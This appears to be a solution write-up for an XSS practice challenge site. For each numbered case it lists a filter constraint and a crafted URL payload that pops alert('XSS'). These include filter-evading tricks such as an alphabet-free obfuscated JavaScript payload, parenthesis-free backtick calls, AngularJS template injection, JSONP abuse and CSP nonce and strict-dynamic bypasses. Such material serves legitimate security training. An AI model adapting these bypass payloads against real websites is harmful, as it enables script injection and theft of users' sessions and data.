xss.shift-js.info Solution

   

XSS Challenge

http://xss.shift-js.info/

1. Simple XSS 1

1
http://xss.shift-js.info/case01.php?payload=%3Csvg/onload=alert(%27XSS%27)%3E

2. Simple XSS 2

1
http://xss.shift-js.info/case02.php#%3Ciframe/onload=alert('XSS')%3E

3. With htmlspecialchars()

1
http://xss.shift-js.info/case03.php?payload=javascript:alert(%27XSS%27)

4-1. Without any backquotes and HTML tags

1
http://xss.shift-js.info/case04-1.php?payload=${alert(%27XSS%27)}

4-2. Without any backquotes, HTML tags and [ux]

1
http://xss.shift-js.info/case04-2.php?payload=${alert(%27XSS%27)}

5. Without any alphabets

1
http://xss.shift-js.info/case05.php?payload=%24%3D~%5B%5D%3B%24%3D%7B___%3A%2B%2B%24%2C%24%24%24%24%3A(!%5B%5D%2B%22%22)%5B%24%5D%2C__%24%3A%2B%2B%24%2C%24_%24_%3A(!%5B%5D%2B%22%22)%5B%24%5D%2C_%24_%3A%2B%2B%24%2C%24_%24%24%3A(%7B%7D%2B%22%22)%5B%24%5D%2C%24%24_%24%3A(%24%5B%24%5D%2B%22%22)%5B%24%5D%2C_%24%24%3A%2B%2B%24%2C%24%24%24_%3A(!%22%22%2B%22%22)%5B%24%5D%2C%24__%3A%2B%2B%24%2C%24_%24%3A%2B%2B%24%2C%24%24__%3A(%7B%7D%2B%22%22)%5B%24%5D%2C%24%24_%3A%2B%2B%24%2C%24%24%24%3A%2B%2B%24%2C%24___%3A%2B%2B%24%2C%24__%24%3A%2B%2B%24%7D%3B%24.%24_%3D(%24.%24_%3D%24%2B%22%22)%5B%24.%24_%24%5D%2B(%24._%24%3D%24.%24_%5B%24.__%24%5D)%2B(%24.%24%24%3D(%24.%24%2B%22%22)%5B%24.__%24%5D)%2B((!%24)%2B%22%22)%5B%24._%24%24%5D%2B(%24.__%3D%24.%24_%5B%24.%24%24_%5D)%2B(%24.%24%3D(!%22%22%2B%22%22)%5B%24.__%24%5D)%2B(%24._%3D(!%22%22%2B%22%22)%5B%24._%24_%5D)%2B%24.%24_%5B%24.%24_%24%5D%2B%24.__%2B%24._%24%2B%24.%24%3B%24.%24%24%3D%24.%24%2B(!%22%22%2B%22%22)%5B%24._%24%24%5D%2B%24.__%2B%24._%2B%24.%24%2B%24.%24%24%3B%24.%24%3D(%24.___)%5B%24.%24_%5D%5B%24.%24_%5D%3B%24.%24(%24.%24(%24.%24%24%2B%22%5C%22%22%2B%24.%24_%24_%2B(!%5B%5D%2B%22%22)%5B%24._%24_%5D%2B%24.%24%24%24_%2B%22%5C%5C%22%2B%24.__%24%2B%24.%24%24_%2B%24._%24_%2B%24.__%2B%22(%27%5C%5C%22%2B%24.__%24%2B%24._%24%24%2B%24.___%2B%22%5C%5C%22%2B%24.__%24%2B%24._%24_%2B%24._%24%24%2B%22%5C%5C%22%2B%24.__%24%2B%24._%24_%2B%24._%24%24%2B%22%27)%22%2B%22%5C%22%22)())()%3B

6-1. Without any paretheses

1
http://xss.shift-js.info/case06-1.php?payload=%3Csvg/onload=alert`XSS`%3E

6-2. Without any parentheses and [oO][nN]

1
http://xss.shift-js.info/case06-2.php?payload=%3Cscript%3Ealert`XSS`%3C/script%3E

6-3. Without any paretheses and .[oO].[nN].*

1
http://xss.shift-js.info/case06-3.php?payload=%3Cscript%3Ealert`XSS`%3C/script%3E

6-4. Without any paretheses, .[oO].[nN].* and tag attributes

1
http://xss.shift-js.info/case06-4.php?payload=%3Ciframe/src=javascript:alert`XSS`//

7-1. Without any quotes

1
http://xss.shift-js.info/case07-1.php?payload=%3Csvg/onload=alert(/XSS/.source)%3E

7-2. Without any quotes and &#

1
http://xss.shift-js.info/case07-2.php?payload=%3Csvg/onload=alert(/XSS/.source)%3E

8-1. Without any backquotes, parentheses and HTML tags

1
http://xss.shift-js.info/case08-1.php?payload=%22%0aalert(%22XSS%22)//onmouseover=%27javascript://

8-2. Without any backquotes, parentheses, HTML tags and &#

1
http://xss.shift-js.info/case08-2.php?payload=%22%0aalert(%22XSS%22)//onmouseover=%27javascript://

9-1. Without any spaces and script

1
http://xss.shift-js.info/case09-1.php?payload=%3Csvg/onload=alert(%27XSS%27)%3E

9-2. Without any spaces and [sS][cC][rR][iI][pP][tT]

1
http://xss.shift-js.info/case09-2.php?payload=%3Cx/onmouseover=alert(%22XSS%22)%3E

20. Bad use of JSONP

1
http://xss.shift-js.info/case20.php?payload=%3Cscript/src=jsonp.php?callback=alert(%27XSS%27)%3E%3C/script%3E

21. nonce + unsafe-eval

1
http://xss.shift-js.info/case21.php?payload=%3Cinput/id=%22equation%22value=alert(%27XSS%27)%3E%3C!--

22. nonce + unsafe-eval

1
http://xss.shift-js.info/case22.php?payload={{constructor.constructor(%22alert(%27XSS%27)%22)()}}

23. nonce + strict-dynamic

1
http://xss.shift-js.info/case23.php?payload=alert(%27XSS%27)//%3Cscript/id=injectarea%3E%3C/script%3E%3C!--